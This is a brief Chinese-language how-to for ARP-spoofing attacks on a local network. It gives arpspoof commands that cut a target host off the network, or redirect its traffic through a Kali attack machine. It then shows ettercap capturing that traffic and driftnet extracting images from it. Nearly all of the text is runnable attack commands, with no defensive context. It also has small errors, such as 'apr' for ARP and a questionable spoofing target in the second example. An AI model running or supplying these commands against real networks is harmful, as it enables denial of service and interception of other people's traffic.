apr 分为断网跟转发功能
在 /proc/sys/net/ipv4/ip_forward 文件中
如果设置为 0 代表断网(默认设置),如果是 1 代表转发
1、断网
设置 /proc/sys/net/ipv4/ip_forward 值为 0
arpspoof -i eth0 -t 192.168.20.10 192.168.20.1
-i interface 指定eth0 网卡,-t target 目标(192.168.20.10) 192.168.20.1(网关)
2、流量转发
设置 /proc/sys/net/ipv4/ip_forward 值为 1
arpspoof -i eth0 -t 192.168.20.6 192.168.20.99
192.168.20.6 为目标主机,192.168.20.99 为 kali 攻击机
2.1、然后用 ettercap 捕获流量情况
ettercap -Tq -i eth0 # T 代表 text 文本显示 q 代表安静
2.2、你还可以使用 driftnet 捕获图片
driftnet -i eth0
